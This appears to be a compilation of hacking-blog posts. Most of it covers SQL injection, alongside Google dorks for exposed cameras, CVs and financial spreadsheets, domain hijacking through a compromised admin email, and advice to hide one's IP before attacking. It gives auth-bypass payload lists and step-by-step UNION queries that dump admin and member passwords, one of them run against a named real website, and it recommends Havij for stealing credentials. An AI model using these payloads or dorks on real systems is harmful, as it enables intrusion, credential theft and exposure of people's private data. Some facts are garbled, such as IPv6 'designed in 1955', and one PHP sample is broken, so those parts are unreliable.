Hidding IP Address

Hidding IP Address

IP stands for Internet Protocol and IP address is the address that is assigned to each device connected in computer network that use internet protocol (TCP/IP).
This IP address is used to determine the device location in the network. 
The designers designed Internet Protocol Version 4 (IPv4) and IPv6 as addressing methods. IP addresses are binary numbers, but they are usually stored in text files and displayed in human readable notations, such as 172.16.254.1 (for IPv4), and 2001:db8:0:1234:0:567:8:1 (for IPv6).
IPv4 was designed as a 32bit number system. For example in 172.16.254.1, 172 stands for 10101100 binary number which is of 8 bits and it contains four such 8-bit numbers which total constitute of 32-bit. IPv4 is most widely used system for addressing. Here every number separated by dot can be of range between 0 to 255. For example 216.3.128.1 can IPv4 address.
Due to numerous growth of internet and because of the predicted depletion of available address IPv6 was designed in 1955.
How does IP address will come in use for you ?
You can use IP address of website in your browser address bar instead of domain name. It has its many uses in hacking, as with IP address you can watch out for open and closed ports for particular system which can be very important from hacker point of view. Although we can say that you can not hack any network without its knowledge.
How ever you should remember that your internet device also has an IP address which is recorded by many websites you go through. Also it can be used for your identification. So always remember to hide your IP address to another location before any type of network hacking. 
As you can see below is your traced IP address information by this blog.

So always hide your IP before any network database hacking such as DNS poisoning, SQL injection, Cross-site scripting etc.
How to hide IP address ?
There are ways to hide your IP address manually using command prompt combining your routers configuration. But this will not be safe also it will be very complicated to implement, but let the software should do this for you. It is very easy to hide your IP address by using software, there are many software present for you to use. Search on google for it, also some of its example is Platinum Hide, Hide my IP, Easy-Hide-IP etc. Also don't worry using these software is very safe.

What is hash ?

What is hash ?

When we open an account with any service provider, we are first of all giving them the password to our data. What happens then if it gets exposed in case of software vulnerability.

The problem with password is that you need to store the damn thing so you can access it later on to authenticate a login attempt.If the file is stored somewhere on the disk there will be a way to access it and the game is over.You might be thinking that such a file could be encrypted ,but then you just have another password to save somewhere.

This is where hash came in.

A hash is comparable to a persons fingerprint.A hash of any data is a fixed size "fingerprint" of that data.If we convert a piece of data say a password into hash, then it is not possible to get back the original data. How then such a password will help in securing passwords or even exposing them?

If a data is converted into hash, the computed hash will always be same for that data.Therefore is an application chooses to save password it saves its hash instead of plain text. And whenever user enters password it checks that it matches with the stored hash or not.A weak analogy case would be, you cannot get milk from curd, but you can check if a whit fluid is milk by seeing if it curdles.

A hash is different from encryption, since encryption by its very nature has to be reversible, which hash is not.

During registration system password hash is stored in its database and not the password.

And during login when user enters password its hash is computed and checked with the stored hash and if it matches the user is authenticated.

A popular hashing algorithm is MD5 (Message Digest algorithm 5) which always produces a hash of 128-bit.So for any input, whether is a 3-character or if it is a video file of a few gigabyte,the hash which MD5 will produce will be just 128-bit long.

Another hashing algorithm is SHA-1 (Secure Hash Algorithm) which produces 160-bit hashes.SHA-1 has been superseded by SHA-2, which has has four function that produces hashes of 224bit,256bit,384bit or 512bit.

Hashes can be used for other purposes than just securing passwords.You might be familiar with their usage by download sites for verifying the integrity of download.A download site may provide the MD5 and SHA-1 hash which is used to verify that download is error free,complete and intact. Any difference in hash will mean that the download is corrupted or malicious.Torrent file uses SHA-1 hashes for each piece of content you are downloading. In torrent downloading is done by dividing files is many packets and each packet has its hash. So if there is any type of error only that piece can be re-downloaded.

How to hack using google

How to hack using google

Google serves for almost all type of queries, which mean google makes it possible to reach not only publicly published data but also some of the most confidential information. Here are some search  queries that can hack for confidential data.

Hacking Security Cameras

Real time security cameras used for monitoring places like parking lots, college campus, road traffic etc cab be accessed through google. Just type below query in search bar

inurl:”viewerframe?mode=motion” 

select different searched url 

above shown query shows result which include low refresh rate vedios here is one more query for higher refresh rates

intitle:”Live View / – AXIS” 

Hacking Personal and Confidential Documents 

Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.

intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”

You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.

filetype:xls inurl:”email.xls”

Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query

intitle:index.of finances.xls

Gain access to Free Stuff 

Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.

“?intitle:index.of?mp3 eminem“

Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.

Enjoy!

Domain Hijacking – How to Hack a Domain Name

Domain Hijacking – How to Hack a Domain Name

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.

These information can be obtained by accessing theWHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup (you need to register to view administrative contact information). Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.

Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

sql injection attack

sql injection attack

Q what is sql injection?

A injecting sql queries into another database or using queries to get auth bypass as an admin.

part 1 : Basic sql injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


there are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this

username:Admin
password:'or'1'='1

So click submit and you'r in
NOTE not all sites are vulnerable.


part 2: injecting sql queries to extract the admin username and password

ok so lets say we have a site :
http://www.xxxxx.com/index.php?catid=1
there is a list of dork 4 sites lyk this

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
or the best in my view "full credit to qabandi for discovering this"
"inurl:".php?catid=" site:xxx"


So once you have you'r site
http://www.xxxx.com/index.php?catid=1
now we add a ' to the end of the url
so the site is
http://www.xxxx.com/index.php?catid=1'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"

so this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password
then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de..../admin_1.2_.txt
now if the database is version 5 or up
type
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

sql injection cheat sheet

sql injection cheat sheet

'or''='

1 OR 1=1

1' OR '1'='1

' or 1=1 or ''='

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

What is a sql injection

What is a sql injection

What is SQL Injection?
SQL Injection - \S-Q-L-in-'jek-shen\ - Noun
The technique of inputting malicious data into an SQL statement, which would therefore make the vulnerability present on the database layer.

What It Looks Like?
The vast majority of all SQL injections will take place on an input form.
The most basic of all SQL injections will look like the following:

The Basic SQL injection is :


Quote:
Variable' or 1=1--


Let’s say we have a login form. By inputting the above code, we can use our SQL injection to gain login even without proper credentials!

How’s it work?
Take a look..


Code:
SELECT * FROM users WHERE username = 'Variable' or 1=1--'



See how our code is nicely injected into the query? The result of this query will grant us access regardless of the username, since the result of “1=1? will always be true. In this case, we bypass the whole selection process.

You may have been wondering what the double dashes are for ( — ). These dashes at the end tell the SQL server to ignore the rest of the query. If the exploit isn’t being used on an SQL server, then omitting the double dashes and ending single quote will get the desired results.

Note that while this is the most standard way, it certainly isn’t the only way that malicious users will gain entry. SQL queries will differ greatly from one syntax to another.
It’s also common to see the following:


Code:
') or ('1'='1
"or "1"="1
' or '1'='1
Or 1=1--
" or 1=1--
' or 1=1--



SQL Injection: Attacking Via URLs
As we know it is possible to attack an SQL server through URL and usually much more dangerous to webmasters.
When using PHP and SQL, there is commonly a URL such as the following:


Code:
http://YourWebsite.com/page.php?id=2



By adding a little SQL to the end of the URL, we can attack on SQL server..

I think this is enough, Now Let’s finally find out how to secure your website from SQL injection.


SQL Injection Prevention: Editing Lengths Of Form Components
The first step in the process is simple: simply restrict input fields to the absolute minimum- usually anywhere from 7-12 characters is fine. Doing so will make long queries unable to be input, since the field is only enough characters for smaller queries. This will actually not prevent an SQL injection, but will make work harder for those trying to make use of one.

Note :SQL injection users can simply make a new form and remove the limits on the character length, since the length is in plain HTML and viewable (and editable) by anyone.

SQL Injection Prevention: Data Type Validation
Another good idea is to validate any data once it is received. If a user had to input an age, make sure the input is an actual number. If it was a date, make sure the date is in proper format. Again, this will not prevent an SQL injection in itself- it just makes work harder for those trying to exploit an SQL server.

Note: This is still only slowing attackers down- but isn’t it much more satisfying to have them waste their time before finding out one’s own query is impervious to harm?

SQL Injection Prevention: The Solution In Preventing SQL Attacks
We’ll accomplish this with a simple function that the developers of PHP made especially for SQL injections. We call this function mysql_real_escape_string() - take a look at it below:

Code:
$name = "John";
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username = '$name'";



Although for a more practical use, we would have the $name variable pointed to a POST result, as seen below:

Code:
$name = mysql_real_escape_string($_POST['user']);



And we can even make things easier by putting it into one line:

Code:
$SQL = "SELECT * FROM users where username = "mysql_real_escape_string($POST['user']);



So what’s the output like if malicious users try to get access to our SQL server?
Their attempts may look something like this:


Code:
$malcious_input = "' OR 1'";
// The Above Is The Malicious Input. Don't Be Scared!
// With The mysql_real_escape_string() usage, the following is obtained:

\' OR 1\'
// Notice how the slashes escape the quotes! Now users can't enter malicious data



And the best part is, they just wasted their time and effort for nothing.

Lastly, note that there are libraries and classes that can help aid in the fight against SQL injection. Prepared statements are plausible as well, but as for us, we enjoy sticking to the mysql_real_escape_string() function for less headaches.

sql injection tutorial with examples

sql injection tutorial with examples

SQL INJECTION:
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.


Imagine that you found this site:

http://www.guitarists.net/



Now 1st of all we need to Find the url like this to test sql injection.

id=xyz



Okay suppose we are going with this url

http://www.guitarists.net/links/list.php?id=253



To test the file that has the variable list.php id badly planned, and if we fit in a simple, 'and give us an error identical to that

http://www.guitarists.net/links/list.php?id=253



'



Error:

Quote:
Fatal error: Call to undefined method DB_Error::numRows() in /home/gnet/public_html/links/list.php on line 57


Now we will explore it.


The First Step of all, and find out how many columns have, as we get the correct column, we'll see something different


Code:
Code:
-1+union+select+



This is the basic syntax for this example of attack, but of course you can be
done differently, but I find this easier to start.

Keep Adding Numbers to guess the Correct colunms like this

http://www.guitarists.net/links/list.php?id=-1+union+select+0-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3,4-- [(:]



Beat the SQL error here, here and found that the web, has 4 columns!

Also appears to us the number 1, that is, we know that the column 1 are vulnerable, and it is through them that we are going for a steal information
So now we know, we have 4 columns and column 1 is vulnerable, we will use.

Information_Schema.Tables

table_name & information_schema.tables--



It helps us to Find the table names. Now our Link Would be Like This

http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--



Replacing the vulnerable column 1 in the string table_name.


Note: Here you can see all table, but not always that happens in certain websites, so we can see one by one, and for this you use the term +limit+*,1--

Like:

http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10+from+information_schema.tables+limit+0,1--
...



Well continuing with our web ...

http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--



As we can see there are a lot of tables, but have doubt, is the table members! because we have to stole data from members. admin, administrators etc.

As we can see there is no table like Administrator or admin so now we will try to Explore members and check it What info it has
Now we need to see the columns that the table has for so we used the syntax.

column_name &
information_schema.columns



And our url will be like this.

http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--



Don't confuse going to Explain it now :-j

+where ---> Where?
+table_name= ---> Name of Table?
char() ---> Name of Table in ASCII


e.g:

Code:

Code:
m = 109
e = 101
m = 109
b = 98
e = 101
r = 114
s = 115



Google it "Table in ASCII" you will get the whole table.

Well, now let's find out what we see in

http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--



w0w we succeeded to grab the required info.

Cheers!!

Well, what interests us and the column

Login and password that it is ..

Well, now we make the final injection, the data to steal login and password

The injection is made of the following way ..

To see Login:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,strUsername,2,3,4+from+members--



To see Passwords:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,strPassword,2,3,4+from+members--



There is a much simpler method, which is to see everything
at the same time using the syntax.

concat( )



well, concat serves to unite all at once, then our url would be like this:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members--



Quote
0x3a -> Hexadecimal code, used to insert : between one and another, not to be confused


All Passwords are in text-plain not in hash!

Hope this tutorial helps you to learn sql injection. And to understand different techniques related to sql injection.

This Tutorial is Written for Educational purpose, I am not responsible if anyone use it for illegal purpose. 

Hacking website with SQL Injection

Hacking website with SQL Injection

First of all you need to know about sql. sql stands for structured query language. Now like every language it has some keywords such as SELECT,FROM,WHERE etc. Than how these keywords work, suppose there is a database which contain tables of user's profile. This table has table name,fields,unique key etc. If we write the following code
query =  SELECT * FROM user_data WHERE user_id = + geturlParameter("userid")
this code means select all details from user_data table where unique id is which is taken from URL parameter.
From above reading we have little bit knowledge of how SQL works so we can now move further.

Injection 
Injection flaws such as SQL,OS, and LDAP injection, occur when untrusted data is sent to an interpreter as a part of command query. The attacker's hostile data can trick the interpreter for executing or accessing unauthorized data.
This injected data could be anything, however usually and commonly these attack uses any part of application that is passed on user-supplied data or poorly processed data to sql database.
sql injection attacks are not the sole target of injection attacks, other interpreter such as LDAP, XPath etc can also be exposed in same way.

How sql injection works
Imagine a web application that uses a database query supplied by user such a scenario is very common in fact it is the basis of dynamic website. Here suppose that your id is 32. So if you were looking at your own profile page on website, in the back end it would be constructing query such as:

SELECT * FROM user_data WHERE user_id = + geturlParameter("userid")

One might expect the below URL to get input parameter[geturlParameter("userid")] by user:

http://www.somesite.com/profile.php?userid=32

Now depending on how the query is constructed it may or may not be susceptible to injection. Of course we will examine case where it is.
Here if we were to add sql code to the parameter "userid" in the request url, we could execute the website to that code. For example here we could do something like

http://www.somesite.com/profile.php?uderid=32;DROP important_table

DROP keyword means deleting in sql. Here in example DROP important_table means deleting table named important_table. With this small vulnerability whole database is lost.
So through this method you can change,update,extract data and many more on database can be executed.

How sql injection can be useful in hacking
In dynamic websites, database is created using MysSQl, where userid and passwords for particular user is stored in database and can be tricked using injecting sql commands.
For this you don't have to learn sql there are many software which can do this for you, some of which are Havij, Acunetix etc.
For checking vulnerability of your website Acunetix can be useful for you but for hacking passwords for vulnerable website use havij.

Hacking Website with havij
Havij

For sql injection, website url should be in below format so that havij can inject sql commands

http://www.target.com/index.asp?id=123 

Search for url and paste it in the field Target: and than click analyse button.

 After process of analysing target is complete, click on Tables button

 Than after checking the given keyword by clicking on it press Get Tables

 Now search for appropriate table name that should contain password such as its name can be login, admin etc.
After finding this table, check the box for that table and press Get Columns. This will show you all columns present in that table. As for example login table in selected in below given image.

 Here again search for appropriate column name that should contain password and check it. Now press Get Data and on right side you will get data for your selected fields. In below image user_id and user_password is selected and on the right we got the password and id. 

Use your USB flash drive as virtual RAM ( virtual memory optimization )

Use your USB flash drive as virtual RAM ( virtual memory optimization )

What is virtual memory? 
Virtual Memory is not the part of system hardware but it is only the virtual ram made on hard disk. In virtual memory space from hard disk is utilised for applications that are currently not in use. It is a very essential part of system software i.e. operating system. Amount of space available for virtual memory is known as swap memory that can be used for swapping files.
So virtual memory is the part of operating system which decides how to use hard disk space as ram.
How it works?
Now suppose your system have 512 MB or 1024 MB of ram and you are running four application simultaneously. Also your operating system services are running on that ram only, so now with four applications and system services your ram space is full, so in your next preceding order to system should say that your ram is full now but it never says that. Why is it so ?
This is because all the processes required for your recent activity or for application you are currently running are saved on the ram and all the processes that are not in use are transferred to virtual memory or swap memory so that it can be swapped with currently running data on ram whenever required.
How these functions have to occur are decided by the architecture of virtual memory made, which depends on the operating system that how it is designed to use swap memory. Space available for virtual memory can be decided and manually edited by user but it should be at least 1.5 times of ram size for significant performance.

Virtual Memory makes a image file on hard disk of the size same as virtual memory size and this file is know asPAGE FILE. On windows page file has .sys (system file) extension and this file can be seen by unhiding the protected system files. Here the image shown has XP set for 768 MB of initial virtual memory. 


And off course how the virtual memory perform will depend on the read/write speed of hard disk. If your system have enough ram to work with than the swap memory usage is very low so performance remains better but if your system doesn't have enough ram than utilization of swap memory increases which is called THRASHING and this greatly slows down your computer, this is because speed of hard disk is much slower than ram. This isn't mean that virtual memory is of no use it is of great importance for optimal performance but it can't replace your ram.

Optimizing system for best performance

What are conditions for best performance of your virtual ram. Firstly it should be 1.5 times of size of the ram. Suppose that your system have 1GB ram than your virtual memory should be set to 1.5GB of size. Secondly the device you are using for your virtual memory should have faster read/write speed than your hard disk otherwise there will be decrease in performance.
Now for using device as your virtual ram other than your hard disk than connect your device, suppose your device has assigned E alphabet and now follow the below steps:

•  Go to my computer properties.

• Click 'Advanced tab' and go to 'settings' under heading performance

• Now again click 'Advanced tab' than click 'change'.

                               

• Here you have to select 'no paging file' option for all drives and press set. Than select your device letter and select 'custom size' option and define initial and maximum size for virtual memory. Here maximum size should be 1.5 times of ram.

                               

Your external virtual memory device can be USB 2.0, external HDD, SSD, USB 3.0 etc. But as told it should be faster than your primary hard disk. You should use atleast USB 3.0 for significant performance increase,  also if you don't have USB 3.0 port buy the internal card for its support, as it is much faster than USB 2.0. If you don't want to buy the internal USB 3.0 card than use SSD drive as it can be connected to usb port. But the best option will be the express card if you have express port and you can afford it, it is presently the fastest external card.